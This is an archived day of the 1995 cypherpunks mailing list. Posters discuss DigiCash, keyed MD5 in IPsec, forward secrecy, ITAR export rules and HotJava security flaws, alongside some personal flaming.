From ljo at ausys.se Wed Nov 1 05:31:17 1995
From: ljo at ausys.se (Johansson Lars)
Date: Wed, 1 Nov 95 05:31:17 PST
Subject: (cpx) Digicash tagged with payee?
Message-ID: <95Nov1.143001gmt+0100.53766@void.ausys.se>

Hal Finney writes:

>I have heard it claimed that when you make a payment with Digicash ecash,
>the identity of the payee is encoded or embedded into the cash somehow.
>This is an anti-theft measure (among other things, perhaps). The bank
>checks that the embedded identity in deposited cash matches the account
>name which is doing the deposit.

Where have you heard that? Everything I've heard from DigiCash seems to indicate that no such "payee encoding" is performed.

>My question is, how could this be done? How can the payor, at payment
>time, without communicating with the bank, embed a payee name
>irreversibly into the cash so that a thief cannot strip it out and
>replace it with his own name?

It is possible though with other (theoretical) protocols, such as Chaum, Fiat and Naor's off-line cash scheme (briefly described in Schneier's book 'Applied Cryptography') and especially the (off-line) cash system, developed by Stefan Brands. In these systems, when Alice spends a coin at Bob's shop she has to respond to a random challenge, sent to her by Bob. This random challenge could possibly be a hash of Bob's identity and some other values. My impression though is that this is not a feature of the current implementation of ecash.

>Off-list there has been some discussion about the role of certificates in
>ecash, and in cash systems in general. It would be interesting to know
>if this anti-theft provision of Digicash is actually provided by means of
>a certificate.

It is conceivable to think of the above mentioned methods in that way, yes

/Lars Johansson
ljo at ausys.se

From perry at piermont.com Wed Nov 1 08:51:42 1995
From: perry at piermont.com (Perry E.
Metzger)
Date: Wed, 1 Nov 95 08:51:42 PST
Subject: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <199511011651.LAA02027@jekyll.piermont.com>

Mr. Anonymous: Why is this being sent to cypherpunks? It's totally irrelevant.

.pm

Anonymous writes:
> The Wall Street Journal, October 31, 1995, p. B6.
>
>
> IBM Announces New Software Code That Is Universal
>
> By Laurie Hays
>
>
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.
>
> For software developers and businesses that want to develop
> one set of codes to run applications on many different
> machines, Microkernal offers an opportunity for the
> long-touted open computing. A big challenge remains, however:
> to market the technology and make a business case for software
> developers to write for Microkernal in a world that is
> dominated by Intel Corp. and Microsoft Corp.
>
> "It's exciting technology, but it will be hard for them to
> market," says Dan Kuznetsky, an analyst with International
> Data Corp., a Framingham, Mass., market-research firm. "It's
> also got a long way to go from what they've announced to the
> future."
>
> Mr. Kuznetsky likens the technology to the development of a
> great automobile transmission that has yet to be turned into
> a truck or a car.
>
> The key to Microkernal is a single source code base that
> communicates between the hardware and the operating system.
> One long-term possibility, for example, would be to make the
> Apple Computer Inc.'s Macintosh operating system work on an
> Intel PC, impossible today because the two have different
> design architectures that don't talk to each other.
>
> IBM's delayed OS/2 operating system for the PowerPC chip,
> which is expected to be shipped by the end of the year, will
> be the first IBM offering for the Microkernal allowing
> developers to move applications to the chip with only small
> changes.
>
> IBM so far has garnered a number of licensing agreements for
> Microkernal, including Digital Equipment Corp., Maynard,
> Mass., and LG Electronics, formerly the Korean electronics
> concern Goldstar, as well as a number of universities.
>
> -----

From ncra at ix.netcom.com Wed Nov 1 13:31:34 1995
From: ncra at ix.netcom.com (NCRA )
Date: Wed, 1 Nov 95 13:31:34 PST
Subject: SCO Unix Crontab Problems-Need Help
Message-ID: <199511012132.NAA20695@ix2.ix.netcom.com>

I have a bourne shell that I need to execute in SCO unix 4.0 from a crontab. The script is a communications upload using ecu. The script runs just fine in terminal mode, but when it is executed in cron, it is not able to gain access of the modem for some reason.

Q: Is there something special that needs to be added to the crontab line in order to allow for tty access?

Please let me know if you have any suggestions.

From fc at all.net Wed Nov 1 02:35:42 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 18:35:42 +0800
Subject: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <9511011022.AA08641@all.net>

> The most charitable explanation for "Dr." Fred is that
> he's degenerated into the professional equivalent of
> those pathetic aging former chess masters who try to
> eke out a subsistence living by charging five bucks a
> game. People often play with them out of sympathy, or
> for the novelty of having lost to a past great. It's
> part of the chess culture, and it's basically harmless
> and sort of quaint.

Most of them could still beat your chess game.

> The difference, of course, is that it's almost impossible
> to have sympathy for Dr. Fred.
> His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

Sour grapes, and from an anonymous poster too. Oooo - I'm insulted.

I have been thinking about the issues of anonymity for some time, and I have been convinced for some time that you can't have both integrity and anonymity. I thought there might be ways to accomplish this, but the cypherpunks have convinced me it isn't true. Show some integrity and tell us who you are.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From jya at pipeline.com Wed Nov 1 06:15:13 1995
From: jya at pipeline.com (John Young)
Date: Wed, 1 Nov 1995 22:15:13 +0800
Subject: OH?_bob
Message-ID: <199511011354.IAA27676@pipe1.nyc.pipeline.com>

11-1-95. NYPaper, Page One lead:

"C.I.A. Tells Panel It Failed To Sift Spy Data. Disinformation May Have Led to Spending for Illusionary Perils."

The C.I.A. admitted today that it knowingly gave the White House and the Pentagon inside information on the Soviet Union without warning that it came from foreign agents it knew or strongly suspected were controlled by Moscow. The information may have affected decisions to spend billions of dollars on military hardware. Even when the agency knew or suspected that its sources were double agents it never warned that its inside information was tainted. The agency thought it more important to protect its suspect Soviet sources than to tell the nation's leaders the truth. That disclosure threatens the C.I.A.'s foundation; its central mission is to speak the truth to those in power. "Something has gone terribly wrong," Senator Bob Kerrey said.

OH?_bob (8 kb)

From perry at piermont.com Wed Nov 1 06:25:17 1995
From: perry at piermont.com (Perry E.
Metzger)
Date: Wed, 1 Nov 1995 22:25:17 +0800
Subject: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510312015.AA00768@zorch.w3.org>
Message-ID: <199511011359.IAA01892@jekyll.piermont.com>

hallam at w3.org writes:
>
> >A keyed version of MD5 is the base authentication mechanism in IPSP
> >and it has been heavily examined by a number of very good
> >cryptographers.
>
> Yes we reviewed it and said that it sucked.
>
> Phil wrote a note to Ron and Ron sent in a series of comments.

Phil was complaining largely because in spite of his apparent cryptography credentials he's a lughead who can't have been bothered to understand the architecture -- most of his comments reflected a general ignorance of the process and of the discussions that had preceded. He also complained that the transforms weren't sufficiently generic for his tastes.

However, no complaints AT ALL were made about Hugo's selection of cryptographic transform. We were assured by everyone that it was the right thing to do, with people swearing up and down that it was the appropriate idea. Do you want me to extract the mailing list archives? Every last posting on this topic is on line.

> The sequence of events I heard was that they asked Burt Kaliski for
> a suggestion, he gave them one and they chose something different.

Actually, Kaliski made an off-the-cuff suggestion that all the other crypto folks ripped apart, largely because it was obvious even to me how it could be attacked, and then he backed off.

Perry

From anon-remailer at utopia.hacktic.nl Wed Nov 1 07:30:55 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 1 Nov 1995 23:30:55 +0800
Subject: No Subject
Message-ID: <199511011445.PAA13294@utopia.hacktic.nl>

On Tue, 31 Oct 1995, Anonymous wrote:

> Wall Street Journal, October 30, 1995, p. B3.
> Brad Meinert, senior analyst at research firm Input, says the
> tremendous growth of the World Wide Web, a graphics Internet
> interface, "is putting increased capacity demands for greater
> bandwidth on the Internet infrastructure."

I see our media friends are just as clueful as ever .... graphics Internet interface ?? That's almost as bad as saying "Come visit our Internet Site" when they mean Web site !!

From anonymous-remailer at shell.portal.com Wed Nov 1 07:39:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 1 Nov 1995 23:39:19 +0800
Subject: US government department for crime enforcement!
Message-ID: <199511011440.GAA23008@jobe.shell.portal.com>

It's come to my attention that the US government has a group called the 'Department of the Treasury Financial Crimes Enforcement Network' in Vienna, Virginia.

I know that bureaucrats like to keep themselves busy, but even I didn't think they would go so far as to enforce crimes to keep the law enforcement people busy. What a curious way to spend the taxpayers' money.

Garfield

P.S. :-) for the humor impaired.

From todd at lgt.com Wed Nov 1 08:13:30 1995
From: todd at lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:13:30 +0800
Subject: Please send cash
Message-ID:

Yo Fred, nobody said you were not right on the money, just that these issues clearly have fixes and are part and parcel to a pre-adolescent product, not a mature one. Yes, you get two points for posting the bug report, but lose one for soap-boxing about the woes of the product in general... Keep up the good work, just drop the proselytizing and we all wouldn't mind hearing your rap.

BTW - If you or your friends are up for a game of speed-chess... I'm willing, I used to be *rated* until I dropped off the circuit a few years ago... Winged Benoni, Classical Ruy, or maybe an Accelerated Dragon (for those who play the black)... I won't even charge you the nominal 5$ fee...
>I just picked this up from the Risks forum:
>
>> Date: Mon, 30 Oct 1995 16:14:59 -0500
>> From: Drew Dean
>> Subject: HotJava 1.0 alpha 3 security issues
>>
>> We have found several security problems in the 1.0 alpha 3 release of
>> HotJava from Sun Microsystems. The two most important problems are that
>> HotJava does not enforce the stated limits on where an applet can connect to
>> (an applet can talk to any place with which you have IP-level connectivity),
>> and HotJava is vulnerable to a man-in-the-middle attack, where someone can
>> watch your web-surfing, both seeing your requests, and the content that you
>> receive.
>
>Two of the Java attacks I outlined in this forum and got abuse for.
>
>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere. At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>>
>> HotJava also allows an applet to set the proxy servers that the browser
>> uses. This opens up a huge hole for anyone concerned about the privacy of
>> their web surfing.
>
>Attacks 31-49 work here.
>
>> Please note that these bugs are specific to the 1.0 alpha 3 release, and are
>> _not_ bugs in the Java language itself, nor do they apply to Netscape 2.0
>> beta 1J, which doesn't permit network connections. We have notified Sun of
>> these problems, and are presently writing a paper on these and other issues.
>> We will make more information available on our Web page after we hear back
>> from Sun.
>
>Drat - Sun doesn't offer awards.
>
>>
>> http://www.cs.princeton.edu/~ddean/java/
>>
>> Drew Dean Dan Wallach
>> ddean at cs.princeton.edu dwallach at cs.princeton.edu
>
>Inquiring minds want to know.
>
>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

Regards,
T. S.
Glassey
Chief Technologist
Looking Glass Technologies
todd at lgt.com
(415) 324-4318

From todd at lgt.com Wed Nov 1 08:42:28 1995
From: todd at lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:42:28 +0800
Subject: Please send cash
Message-ID:

>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere. At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>
>What if I start a Java applet then send it a faked TCP/IP packet from another
>host? Can I hotwire an outgoing connection that appears to be from the victim
>host?
>
>TCP/IP connections are not really all that directed. It is only the startup
>phase that is truly directed - someone has to start a conversation.
>
>Planned sequence of events :
>
>Mallet:
>    Send out Java applet to Alice
>    Send Bob a connection request packet on port 22
>    Alice's Java applet is accepting connections.
>    Send Alice a "request" packet claiming to come from port 22
>    Should now have an outgoing connection.
>
>???? I'm not a TCP/IP hacker (much). I'll ask our guru tomorrow after we
>are done with the NSA.
>
>
>    Phill

For the most part this scenario would work. The Java Applet that is doing secure or authenticated work clearly must employ some form of embedded authentication. A cute trick we are employing in one applet under development here at LGT is an embedded stream based bi-directional encryption engine. It provides a direct mechanism to encrypt the data stream within the TCP datagram rather than outside of it.
Since the datagram itself is untouched the simple interface that Java employs is unfettered. However this process adds some performance overhead but allows for a virtual private network to be constructed directly from the server to the applet context. This project/concept will be released sometime in January along with some underpinnings to plug into the FSTC EPayment Handler and its Architecture along with the applet itself...

Yes we will share it with the CypherPunks... It's the best way I know to get a public testing/err bashing and beta cycle on a concept.

We really are not trying to build a product in this effort, rather the intent is to prove that although the general "external transport" is/may be unsecured, that the internal or upper layers do not necessarily suffer from the same security leakage or process models, and that secure transactions can successfully be layered upon these "existing" underpinnings if they are adapted properly. This is especially true with both HiJacking and Spoofing attack modalities. But in our model with the upper layers events are synchronized and validated such that there is little chance for these attack modalities to succeed.

Again for the world to hear - The Java concept is a Transport Harness, not the entire magilla. Clearly that is what is going on here... Without these upper layers it is no safer than normal netscape or any other browser transport.

Sincerely,

Regards,
T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd at lgt.com
(415) 324-4318

From perry at piermont.com Wed Nov 1 09:06:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 2 Nov 1995 01:06:05 +0800
Subject: Perfect Forward Secrecy - is it worth it?
In-Reply-To:
Message-ID: <199511011619.LAA01986@jekyll.piermont.com>

Simon Spero writes:
> Quick survey; how important is perfect forward secrecy to you?

Very. It makes one's life far easier. It makes protecting historical traffic easy. It's a wonderful feature for a cryptosystem.

> In general, schemes offering PFS require an extra PK-op, and an extra
> round-trip when compared to non-PFS schemes. This cost is incurred once
> per "session", but can add on the order of seconds to startup times.

Well, things aren't that bad if you use elliptic curve variants on D-H, or if you are very careful. See Phil Karn's work on this for Photuris...

Perry

From baldwin at RSA.COM Wed Nov 1 10:20:14 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 2 Nov 1995 02:20:14 +0800
Subject: Rivest on the Design of RC4
Message-ID: <9510018152.AA815247765@snail.rsa.com>

Professor Ron Rivest will be presenting a talk titled "The Design of RC4" at the RSA Data Security Conference in San Francisco (January 17 to 19). It should be interesting.

--Bob

From asgaard at sos.sll.se Wed Nov 1 10:22:38 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Thu, 2 Nov 1995 02:22:38 +0800
Subject: New release of CFS...
In-Reply-To:
Message-ID:

Andreas Bogk wrote:

> Please report any leakage of this software immediately to this list.

Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

Mats

From sunder at amanda.dorsai.org Wed Nov 1 10:29:09 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Thu, 2 Nov 1995 02:29:09 +0800
Subject: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <9510260118.AA07260@toad.com>
Message-ID:

On Wed, 25 Oct 1995, John Gilmore wrote:

> It's true, for a period of about 45 minutes today, someone subscribed
> the Cypherpunks list to itself. This resulted in a small number of
> looped messages.
>
> Also in today's bogus news, a rather testy newbie, Arthur Germain,
> subscribed at 8AM Tuesday.
> He had unsubscribed by 3PM Tuesday, but
> when he got another twenty or thirty messages (that had been sent to
> cypherpunks while he was a subscriber, but which hadn't reached him
> yet), he forwarded each of them back to the mailing list. You may or
> may not have seen some of these; I killed off further distribution.

Perhaps we can prevent this sort of thing by putting a signature in each message as majordomo sends it, say some X-Majordomo-Sent-Already header line? Then when majordomo reads an incoming message it would look for that text in both the header and the body, and upon finding it, would discard the message. This would work because removing such a line in order to get majordomo to choke would mean either writing code, or doing it manually.

If cypherpunks is subscribed to itself, it's easy for majordomo to not accept cypherpunks at toad.com as a subscriber. But if someone forwards a message or many back to the list, they'd vanish.

One of the nicer things about FidoNet (perhaps the only one) is that once a system receives a message, it adds a signature in the hidden area called "seen by" with its node number. If Majordomo did that, it would know it sent that message already... Not much of a fix, but a nice-to-do kind of fix. :-)

==========================================================================
 + ^ + |  Ray Arachelian |  Amerika: The land of the Freeh.  | _ |>
  \|/  |sunder at dorsai.org|  Where day by day, yet another  | \ |
<--+-->|                 | Constitutional right vanishes.  | \|
  /|\  |    Just Say     |                                 | <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!| <| n
==========================================================================

From s1113645 at tesla.cc.uottawa.ca Wed Nov 1 15:31:40 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 2 Nov 1995 07:31:40 +0800
Subject: US government department for crime enforcement!
In-Reply-To: <199511011440.GAA23008@jobe.shell.portal.com>
Message-ID:

On Wed, 1 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> It's come to my attention that the US government has a group
> called the 'Department of the Treasury Financial Crimes
> Enforcement Network' in Vienna, Virginia.
>

Yeah, in case you're interested, Anon, Wired had an article on them, I think in 1.2, the cypherpunks issue. It might also be in their privacy archive. Fincen has webpages at www.ustreas.gov/treasury/bureaus/fincen/fincen.html

The agency is pretty much an alternative to the IRS's crumbling computers and a nice cover for possibly unapproved interagency cooperation. Look up some recent posts by Douglas Barnes on a banking conference. Sorry to repeat what's been said here a zillion times before.

This account is a remailer for bad terminal servers. The above opinions are entirely the result of line noise. @#$#@$~%?!!

From shields at tembel.org Wed Nov 1 15:42:17 1995
From: shields at tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 07:42:17 +0800
Subject: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <478lic$vv@yage.tembel.org>

In article <199511010235.DAA00908 at utopia.hacktic.nl>, Anonymous wrote:
> The difference, of course, is that it's almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

So, what part of your analogy was valid?
--
Shields.

From baldwin at RSA.COM Wed Nov 1 16:15:16 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 2 Nov 1995 08:15:16 +0800
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815258328@snail.rsa.com>

Perry,
I personally spoke to Bill Simpson about this problem.
I should have given you a phone call or email in addition to speaking to Bill.

In my opinion this problem does not at all reflect on your skills or reputation. What it signifies to me is the poor state of cryptographic engineering. If anything, it points out the wisdom of the IPsec designers in requiring that key material have a limited lifetime. A wise engineering choice like this protects the system against many different kinds of attacks.

Of course, the protocol implementors often omit "details" like key lifetime limits. In fact, 17 years ago when I wrote a TCP/IP stack for the Xerox Alto I left out several "details", which of course caused lots of problems when I did interoperability testing with a mainframe (Multics).

--Bob

______________________________ Reply Separator _________________________________
On 11/1/95 10:20 AM, perry at piermont.com wrote:
> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he
> would have), and I wasn't called, either. We were the only two
> editors of that portion of the specification.
>
> Given that my name was on that document and that I made a large effort to
> try to make sure that people examined the algorithms and thought they were
> good, and that I have some of my reputation tied to that document, I am
> rather unhappy at the fact that I only find out third hand about what people
> in the field have determined about our selected algorithm.

From shields at tembel.org Wed Nov 1 16:31:10 1995
From: shields at tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 08:31:10 +0800
Subject: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <478k8o$gp@yage.tembel.org>

In article <199511010122.CAA29490 at utopia.hacktic.nl>, Anonymous wrote:
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.

Impressive! I wonder if it works without using algorithms.
--
Shields.

From anonymous-remailer at shell.portal.com Wed Nov 1 16:42:04 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 2 Nov 1995 08:42:04 +0800
Subject: The cost of ITAR
Message-ID: <199511012336.PAA16268@jobe.shell.portal.com>

> Here's the problem: Because the US government has outlawed the export of
> industrial-strength encryption, firms seeking to do business abroad find
> themselves without trustworthy security options once they leave US
> boundaries. How can companies in the information and networking
> business, such as Sun Microsystems, possibly sell a system to Alcatel in
> France, for example, if the encryption that accompanies it can be broken
> by a 14-year-old with too much time on his or her hands? They can't. So
> Sun came up with a novel solution: buy Russian. The Soviets may have
> sucked at cars and strip malls, but they sure as hell knew their
> cryptography. "The Russians can make any kind of encryption you want"
> says Geoffrey Baehr chief network officer at Sun. And what can the US
> government do about a product developed outside its borders? Nothing.

Actually the US government and US industry generally does not follow any coherent industrial development policy of which ITAR is but one single part.
There is almost a jingoistic belief in the "free market" with a concomitant commitment to a strong American individualism. While this may function domestically, it certainly does not function internationally. The US continues to cede entire industries through poor economic and trade policy. I guess, nothing was learned with Boeing and Airbus.

ITAR regulations will simply lock-out US companies from foreign markets, and this combined with "competition" rather than "co-operation" will allow foreign firms to divide and conquer American firms. Foreigners generally don't trust "American" as it is.

Historically, the US has deliberately sold inferior security products while making representations that they were in fact secure. While this *might* work on unsuspecting civilians, internationally it just doesn't pass the giggle test, and won't allow a US firm to even make the bid list outside their own borders in the not too distant future. US companies will lose the entire international market, unless they begin to think globally. Non-legislated trade lockouts based on Nationalism are extremely difficult to overcome.

> In fact, Sun was so taken with Russia's computing talent that the company
> recently hired the entire team once responsible for the next generation
> of Soviet supercomputers (and the Russians brought along the plans for
> the beasts). Ask Sun chief scientist John Gage if he'd rely on
> US-approved encryption to send those plans between Moscow and California,
> and he'll laugh out loud. "We can't rely on that stuff. We're talking
> trade secrets here!" - John Battelle

While John Gage may laugh out loud, it is actually a very serious matter. Trade secrets are not for laughter. As an example, what value is access to Pacific Gas's LAN??
Let's suppose that Pacific Gas could be compromised because of poor security or encryption -- a compromise which occurs as a result of some user installing a commercial web-browser which had a well-known "back door", a browser like the Netscape product. What would be the fallout from this??

Maybe (domestically), Pacific Gas customers might not be _happy_ that PGT's market book was given over to CAPP, and that foreign producers knew *exactly* what Californian's Natural Gas open interest was in advance on a real time basis. And that CAPP, hypothetically, has used and continues to use that information in trading on Natural Gas markets, which results in all Californians paying a 30% premium on their utility bills. Would this be a laughing matter??

Who would laugh if natural gas prices were up (as they in fact are) 25 - 30% at the trading hub AECO-C? And while PGT might ignore daisy chaining, and advance the argument that the hole was at NGX -- rather than at PGT, or maybe that the hole was because a client of NGX installed a copy of Navigator 1.1 somewhere, how far would the laughter carry?? Especially the laughter at the keystone cop finger pointing?? Around the world, maybe?

The idea of a foreign group of producers positioning themselves through high-tech scouting by taking advantage of the shoddy design of a "Made in America" product so that they could indirectly tax the citizens of California is _truly_ a laughing matter. Trivial in fact. The uproar of a class action suit by all the customers of PGT would be but a small nuisance within the context of the international fallout.

Laughter will not be on the lips of US executives when it becomes known that the security flaw in Navigator 1.1 was "well and widely known" within the US software, hardware and security industry, and that ALL members of kept quiet about and around it.
There will be little laughter at the catastrophic trade fallout if it is demonstrable (as it was) that a US multi-billion dollar company knowingly distributed a program which functions as a virus delivery vehicle, and that all US industry members decided that their "industrial policy" dictated that they would not step forward and speak out.

There will be very little laughter amongst shareholders and directors when they become aware that not only were entire markets sacrificed to "keep the secret" but that the entire US economy was put at risk. Good-bye international markets -- not just for the said billion dollar company -- but for all members of the industry who domicile in the US.

> This looks like a striking example of regulatory arbitrage at work, and
> if it can be confirmed in its details ought to be an extremely powerful
> anecdote in the hands of those working against GAK and ITAR.
>
> The sucking sound is American jobs heading overseas,
> the snorting sound is American trade-secrets being sniffed up
> by foreign competitors,

Yep, and it's not even a question of someone else causing this. This is US citizens, and US companies having a limited experience and view in international trade, and that very inexperience leading to their OWN creation of these problems. Has anyone considered GISA in all of this? Probably not.

As an example, I contacted AT&T, regarding the Netscape flaw which was posted to the Internet on Friday the Thirteenth -- the flaw that Netscape had "no comment" on. I asked for AT&T commentary, since they were selling the Netscape product under their own brand. I also asked for referral to their Security Officer, rather than their Public Relations people.

AT&T's response??

"...I am not sure that our security officers are up to it. Often AT&T just repackages an external product, without opening it or understanding it. My guess is that the corporation is likely to simply trust the netscape folks unless an actual hole can be demonstrated."
And with that, there's 'nuff said ...

> Maybe the FBI's responsibility for US counter-intelligence is meant as a
> double-entendre?

I guess getting shot by friendly fire does sound better than saying that you're shooting yourself in the foot. Don't it??

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From hallam at w3.org Wed Nov 1 17:28:57 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 2 Nov 1995 09:28:57 +0800
Subject: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To:
Message-ID: <9510302351.AA28243@zorch.w3.org>

Simon,

Do not spec Keyed MD5, it is a complete loser. It is actually weak against a number of attacks. There are much better constructs for creating a keyed digest. There are much better ways of creating a digest than using a hash function as the base.

There is some work by Phil Rogaway on making keyed digest functions which I strongly recommend people look at. I can post a paper on the subject if people are interested.

Phill

From andrew_loewenstern at il.us.swissbank.com Wed Nov 1 17:29:16 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Thu, 2 Nov 1995 09:29:16 +0800
Subject: S. 1284 To Amend (C) Act
Message-ID: <9510302258.AA00471@ch1d157nwk>

> S. 1284, s1201: "No person shall import, manufacture or distribute
> any device, product, or component incorporated into a device or
> product, or offer or perform any service, the primary purpose or
> effect of which is to avoid, bypass, remove, deactivate, or otherwise
> circumvent, without the authority of the copyright owner or the
> law, any process, treatment, mechanism or system which prevents
> or inhibits the violation of any of the exclusive rights of the
> copyright owner under section 106."

IANAL, but I thought these types of laws were already tested and deemed unconstitutional in cases involving video-tape copying boxes, dual video cassette dubbing decks, SCMS 'scrubbers', etc...
andrew

From futplex at pseudonym.com Wed Nov 1 17:44:50 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 09:44:50 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <9511011022.AA08641@all.net>
Message-ID: <199511011907.OAA16631@opine.cs.umass.edu>

My turn to rise to the bait...

Dr. Frederick B. Cohen writes:
> I have been thinking about the issues of anonymity for some time, and I
> have been convinced for some time that you can't have both integrity and
> anonymity.

What's your working definition of "integrity" in this context ?

-Futplex
"Once anonymous, twice pseudonymous"

From perry at alpha.jpunix.com Wed Nov 1 18:16:45 1995
From: perry at alpha.jpunix.com (John A. Perry)
Date: Thu, 2 Nov 1995 10:16:45 +0800
Subject: Birds of a Feather...
Message-ID:

Hello Everyone! Some of us are going to USENIX in January. If you want to discuss like interests for this event, I've opened #remailop on IRC on DALnet. Need a server? irc.phoenix.net.. See ya there!!

John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers.

From perry at piermont.com Wed Nov 1 18:18:31 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 2 Nov 1995 10:18:31 +0800
Subject: Keyed-MD5, and HTTP-NG
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <199511020123.UAA02652@jekyll.piermont.com>

hallam at w3.org writes:
> This appears to have been a problem from both ends.
A number of
> people around here only heard about the IPsec work when it had
> reached the final call phase.

I can't help that. We were very loud about our efforts and I publicized them wherever I could. I mentioned drafts here on cypherpunks and elsewhere frequently. We tried to solicit the help of lots of people in the crypto community. I was begging people for help with our MD5 and other transforms for months and months. I believe that lots of people were aware of what was going on and just didn't take us seriously until the last minute.

> I think this highlights one of the problems with the IETF we need a
> much broader infrastructure for understanding what progress other
> groups have made. The time when we can expect to do everything through
> email alone is past.

I pretty much know what's going on throughout the IETF, although I don't know all the petty details. I think that it's a matter of trying to remain plugged in and following the announcements of drafts.

> I wish I could persuade more people in the IETF that the Web
> infrastructure could provide a valuable assistance as a
> collaboration tool for their needs. Unfortunately the approach seems
> to be that because there is a person living at the end of a 2400
> baud modem in Vermont who cannot configure his PPP we should all
> continue in the stone age.

There are lots of IETF web pages already.

> We could improve readability of RFCs through using HTML

I truly dislike that idea. I hope that this never comes to pass. Text is just fine. RFCs are perfectly readable right now. The problem is more getting people to read them than legibility problems. If anything would be an improvement it would be postscript, and I oppose that even though it's easy for anyone who wants to to get a postscript interpreter.

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.
I would like to see such a thing as well. I would also like to see a system which permitted perfectly just adjudication of disputes without need for evidence. Unfortunately, neither is possible.

Perry

From sdw at lig.net Wed Nov 1 18:32:40 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Thu, 2 Nov 1995 10:32:40 +0800
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <95Oct31.094528pst."14855(1)"@alpha.xerox.com>
Message-ID:

Besides non-blocking, it's very useful sometimes to support SIGIO/SIGURG for as many devices as possible. I know only too well that Sybase CT_lib uses this for Async mode. (I just tracked down what appears to be an HPUX process group bug preventing the signals from being delivered...)

In any case, using SIGIO is a whole parallel method to using a select loop, and although it seemed like a hack when I found out they were using it, it has some elegance since they chain to other possible signal handlers in case other io descriptors are ready.

> Blocking vs. non-blocking is a standard issue in design of U*X devices.
> Standard solution: make it block by default, and accept an IOCTL to put it in
> non-blocking mode. There's even a POSIX way to do this:
>
> flags_or_err = fcntl(fd, F_GETFL, 0);
> {check for error}
> res = fcntl(fd, F_SETFL, flags_or_err | O_NONBLOCK);
> {check for error}

sdw
--
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From fc at all.net Wed Nov 1 18:38:22 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 10:38:22 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <9511020130.AA17317@all.net>

> My turn to rise to the bait...
>
> Dr. Frederick B.
Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
> > have been convinced for some time that you can't have both integrity and
> > anonymity.
>
